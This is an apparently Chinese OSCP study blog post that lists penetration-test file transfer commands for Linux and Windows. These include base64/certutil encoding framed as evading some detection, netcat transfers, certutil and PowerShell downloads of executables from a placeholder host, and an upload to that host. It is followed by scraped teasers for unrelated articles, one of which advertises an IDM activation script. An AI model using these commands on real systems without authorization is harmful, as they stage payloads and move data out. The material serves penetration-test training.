OSCP:常见文件传输方法
在渗透测试过程中,文件传输是一个关键环节,涉及不同的协议和工具,本文整理了 Linux 和 Windows 系统下常见的文件传输方法,并提供相应的命令示例。
通用文件传输方式
Base64 编码传输
Base64 可用于跨平台传输文件,避免因字符集或杀软拦截问题导致传输失败。
- 编码:
- Linux:
base64 -w0 < file > file.b64 - Windows:
certutil -encode file.dll file.b64
- Linux:
- 解码:
- Linux:
base64 -d file.b64 > file - Windows:
certutil -decode file.b64 file.dll
- Linux:
HTTP 服务器(Python)
Python 内置 HTTP 服务器可用于快速文件传输:
- Python3:
python3 -m http.server 80 - Python2:
python -m SimpleHTTPServer 80 - 下载文件:
wget http://IP/file -O /tmp/file
Linux 文件传输
Netcat(nc)
Netcat 可用于文件传输,但需确保目标主机也安装了 nc。
- 发送文件:
nc -nv $IP $PORT < file - 接收文件:
nc -nlvp $PORT > file
SSH
- 上传文件:
scp file user@IP:/tmp/ - 下载文件:
scp user@IP:/tmp/file ./
FTP
- 文件传输模式
- 二进制模式(适用于可执行文件):
ftp > binary - 文本模式(适用于可读内容):
ftp > ascii
- 二进制模式(适用于可执行文件):
了解二者区别可阅读这篇文章:FTP binary and ASCII transfer types and the case of corrupt files
- 快速搭建 FTP 服务器
apt-get install python-pyftpdlibpython -m pyftpdlib -p 21 -w
TFTP
TFTP 适用于传输小文件,但需要手动启动服务:
- 启动 TFTP 服务器:
service atftpd start - 客户端下载文件:
tftp -i $IP GET file - 客户端上传文件:
tftp -i $IP PUT file - Windows 启用 TFTP:
pkgmgr /iu:"TFTP"
SMB(Windows 文件共享)
SMB 适用于 Windows 和 Linux 之间的文件共享。
- 在 Linux 启动 SMB 服务器:
impacket-smbserver -smb2support share ./ - Windows 访问 SMB 共享:
- 复制文件:
copy \IP\sharefile C:\Temp - 挂载共享:
net use Z: \\IP\share
- 复制文件:
Windows 文件传输
PowerShell
- 下载文件:
powershell -c "(New-Object System.Net.WebClient).DownloadFile('http://IP/file', 'C:\file.exe')" - 上传文件:
powershell -c "Invoke-RestMethod -Uri http://IP/upload.php -Method Post -Infile 'C:\file.exe'"
Certutil
Windows 内置 certutil 可用于文件下载:
certutil -urlcache -f http://IP/file C:\file.exe
其他方法
通过 UPX 压缩可执行文件(减少文件大小)
upx -9 file.exe
总结
文件传输在渗透测试过程中至关重要,常见方式包括:
- HTTP 服务器(Python 轻量级文件传输)
- SMB 共享(适用于 Windows 传输大文件)
- FTP/TFTP(适用于特定环境)
- Base64 编码(规避部分安全检测)
- PowerShell & Certutil(Windows 内置工具传输文件)
选择合适的传输方式,能有效提升渗透测试效率!
相关文章:
OSCP:常见文件传输方法
在渗透测试过程中,文件传输是一个关键环节,涉及不同的协议和工具,本文整理了 Linux 和 Windows 系统下常见的文件传输方法,并提供相应的命令示例。 通用文件传输方式 Base64 编码传输 Base64 可用于跨平台传输文件,…...
B站吴恩达机器学习笔记
机器学习视频地址: 4.5 线性回归中的梯度下降_哔哩哔哩_bilibili 机器学习分类: 1. 有监督学习(Supervised Learning) 在有监督学习中,训练数据包含了输入特征和正确的输出标签,模型通过这些带有标签的…...
Java 性能优化与新特性
Java学习资料 Java学习资料 Java学习资料 一、引言 Java 作为一门广泛应用于企业级开发、移动应用、大数据等多个领域的编程语言,其性能和特性一直是开发者关注的重点。随着软件系统的规模和复杂度不断增加,对 Java 程序性能的要求也越来越高。同时&a…...
【计算机网络】host文件
host文件的主要功能: 域名解析 本地映射:host文件的主要功能是将**域名映射到相应的 IP 地址**。当计算机需要访问一个网站或服务时,它会首先在 host文件中查找该域名对应的 IP 地址。如果在 host文件中找到了匹配的域名和 IP 地址映射&…...
【C语言】在Windows上为可执行文件.exe添加自定义图标
本文详细介绍了在 Windows 环境下,如何为使用 GCC 编译器编译的 C程序 添加自定义图标,从而生成带有图标的 .exe 可执行文件。通过本文的指导,读者可以了解到所需的条件以及具体的操作步骤,使生成的程序更具专业性和个性化。 目录 1. 准备条件2. 具体步骤步骤 1: 准备资源文…...
爬虫基本原理)
爬虫基础(五)爬虫基本原理
目录 一、爬虫是什么 二、爬虫过程 (1)获取网页 (2)提取信息 (3)保存数据 三、爬虫可爬的数据 四、爬虫问题 一、爬虫是什么 互联网,后面有个网字,我们可以把它看成一张蜘蛛网…...
)
力扣【1049. 最后一块石头的重量 II】Java题解(背包问题)
让石头分成重量相同的两堆(尽可能相同),相撞之后剩下的石头就是最小的。进一步转化成容量为重量总喝一半的背包最多可以装多少质量的石头。这样就转化成了背包问题。 最后求结果时,我们所最多能装的时dp[target],那另一…...
FFmpeg rtmp推流直播
文章目录 rtmp协议RTMP协议组成RTMP的握手过程RTMP流的创建RTMP消息格式Chunking(Message 分块) rtmp服务器搭建Nginx服务器配置Nginx服务器 librtmp库编译推流 rtmp协议 RTMP(Real Time Messaging Protocol)是由Adobe公司基于Flash Player播放器对应的…...
(附脚本))
WordPress Icegram Express插件Sql注入漏洞复现(CVE-2024-2876)(附脚本)
免责申明: 本文所描述的漏洞及其复现步骤仅供网络安全研究与教育目的使用。任何人不得将本文提供的信息用于非法目的或未经授权的系统测试。作者不对任何由于使用本文信息而导致的直接或间接损害承担责任。如涉及侵权,请及时与我们联系,我们将尽快处理并删除相关内容。 0x0…...
)
重构字符串(767)
767. 重构字符串 - 力扣(LeetCode) 解法: class Solution { public:string reorganizeString(string s){string res;//因为1 < s.length < 500 , uint64_t 类型足够uint16_t n s.size();if (n 0) {return res;}unordere…...
IO进程线程复习
IO进程线程复习...
深入理解Linux内核的虚拟地址到物理地址转换机制及缓存优化
在现代计算机系统中,虚拟地址到物理地址的转换是操作系统内存管理的重要组成部分。特别是在基于x86_64架构的Linux系统上,这一转换过程及其相关的缓存机制对系统性能和稳定性至关重要。本文将深入探讨Debian 10上运行Linux 4.19内核时,这些机制的实现细节,特别是页表管理、…...
2025年01月29日Github流行趋势
项目名称:Janus 项目地址url:https://github.com/deepseek-ai/Janus项目语言:Python历史star数:9350今日star数:5969项目维护者:learningpro, hills-code, TheOneTrueGuy, mowentian, soloice项目简介&…...
yolov11、yolov8部署的7种方法(yolov11、yolov8部署rknn的7种方法),一天一种部署方法,7天入门部署
由于涉及量化、部署两个领域,本博文难免有不对之处,欢迎指正。 本博客对 yolov11(yolov8)尝试了7种不同的部署方法,在最基础的模型上一步一步的去掉解码相关的操作(移到后处理种进行)࿰…...
【ArcGIS遇上Python】批量提取多波段影像至单个波段
本案例基于ArcGIS python,将landsat影像的7个波段影像数据,批量提取至单个波段。 相关阅读:【ArcGIS微课1000例】0141:提取多波段影像中的单个波段 文章目录 一、数据准备二、效果比对二、python批处理1. 编写python代码2. 运行代码一、数据准备 实验数据及完整的python位…...
Node.js MySQL:深度解析与最佳实践
Node.js MySQL:深度解析与最佳实践 引言 Node.js作为一种流行的JavaScript运行时环境,以其轻量级、高性能和事件驱动模型受到开发者的青睐。MySQL则是一款功能强大的关系型数据库管理系统,广泛应用于各种规模的应用程序中。本文将深入探讨Node.js与MySQL的集成,分析其优势…...
wordpress外贸独立站常用询盘软件
LiveChat LiveChat是一家提供实时聊天软件的公司,帮助企业通过其平台与客户进行即时通讯,提高客户满意度和忠诚度。他们的产品允许企业在网站、应用程序或电子邮件等多个渠道与客户互动,从而提升客户体验并促进销售增长。 LiveChat的软件特…...
Kotlin 委托详解
Kotlin 委托详解 引言 Kotlin 作为一种现代化的编程语言,在 Android 开发等领域得到了广泛的应用。在 Kotlin 中,委托(Delegation)是一种强大的特性,它可以让我们以更简洁的方式实现代码的复用和扩展。本文将详细解析…...
Cursor 简介:AI 如何改变编程体验
在软件开发领域,效率和质量始终是开发者们追求的目标。随着人工智能技术的飞速发展,编程工具也在不断进化,Cursor 便是这一趋势下的产物。它不仅仅是一个代码编辑器,更是一个集成了 AI 能力的智能编程助手,旨在通过 AI…...
Fiddler(一) - Fiddler简介_fiddler软件
文章目录 一、为什么选择Fiddler作为抓包工具? 二、什么是Fiddler?三、Fiddler使用界面简介四、延伸阅读 一、为什么选择Fiddler作为抓包工具? 抓包工具有很多,小到最常用的web调试工具firebug,大到通用性强大的抓包工具wireshark。为什么使用fid…...
IDM激活的3种方案:兼容Win7-11的终极解决方案
IDM激活的3种方案:兼容Win7-11的终极解决方案 【免费下载链接】IDM-Activation-Script IDM Activation & Trail Reset Script 项目地址: https://gitcode.com/gh_mirrors/id/IDM-Activation-Script 问题引入:IDM试用期到期的烦恼 Internet D…...
TradingAgents-CN完整指南:5分钟搭建你的AI股票分析系统
TradingAgents-CN完整指南:5分钟搭建你的AI股票分析系统 【免费下载链接】TradingAgents-CN 基于多智能体LLM的中文金融交易框架 - TradingAgents中文增强版 项目地址: https://gitcode.com/GitHub_Trending/tr/TradingAgents-CN 还在为复杂的金融量化系统搭…...
量化交易框架VectorBT:重新定义金融策略开发的高性能方法论
量化交易框架VectorBT:重新定义金融策略开发的高性能方法论 【免费下载链接】vectorbt Find your trading edge, using the fastest engine for backtesting, algorithmic trading, and research. 项目地址: https://gitcode.com/gh_mirrors/ve/vectorbt Ve…...
Flutter助力斩获大厂offer:我的技术突破与成长之路
一、起点:迷茫与选择 2024年春天,我站在人生的十字路口。 非科班出身、零项目经验、简历一片空白,投了20多份简历,连面试机会都寥寥无几。那时的我,每天刷着招聘软件,看着“3年经验”“精通Flutter/React …...
别再只会用按钮上传了!用JEECG的JUpload组件打造更优雅的后台文件管理界面
从按钮到拖拽:用JEECG的JUpload组件重构后台文件管理体验 在后台管理系统开发中,文件上传功能几乎是每个项目都无法绕开的刚需。但你是否注意到,大多数开发者仍然停留在传统的按钮式上传方式?这种"点击-选择-上传"的三部…...
AI头像生成器与SpringBoot集成实战:企业级应用开发指南
AI头像生成器与SpringBoot集成实战:企业级应用开发指南 你有没有想过,为什么现在很多电商平台的新用户注册后,头像都那么有个性,而且风格还挺统一?这背后其实不是设计师在加班加点,而是AI头像生成器在默默…...
)
北斗网格位置码实战:从编码原理到Java实现(非极地)
1. 北斗网格位置码:为什么我们需要它? 当你打开手机地图查看自己的位置时,看到的通常是经纬度坐标。这种表示方式虽然精确,但在实际应用中却存在不少问题。比如在物流配送系统中,直接存储和查询经纬度数据效率很低&am…...
TurtleBot3在Gazebo中的多机器人SLAM仿真:ROS2 Humble命名空间实战
TurtleBot3多机SLAM仿真:ROS2 Humble命名空间深度实践 在机器人开发领域,仿真环境的重要性不言而喻。它不仅能大幅降低硬件成本,还能提供可重复、可控的测试条件。ROS2 Humble作为当前长期支持版本,结合Gazebo仿真器和TurtleBot3…...
5步实现消息永久可见:微信QQ防撤回设置完全指南
5步实现消息永久可见:微信QQ防撤回设置完全指南 【免费下载链接】RevokeMsgPatcher :trollface: A hex editor for WeChat/QQ/TIM - PC版微信/QQ/TIM防撤回补丁(我已经看到了,撤回也没用了) 项目地址: https://gitcode.com/GitH…...
Wasmtime代码缓存机制:提升WebAssembly执行性能的终极指南
Wasmtime代码缓存机制:提升WebAssembly执行性能的终极指南 【免费下载链接】wasmtime A fast and secure runtime for WebAssembly 项目地址: https://gitcode.com/gh_mirrors/wa/wasmtime Wasmtime作为一款快速且安全的WebAssembly运行时,其代码…...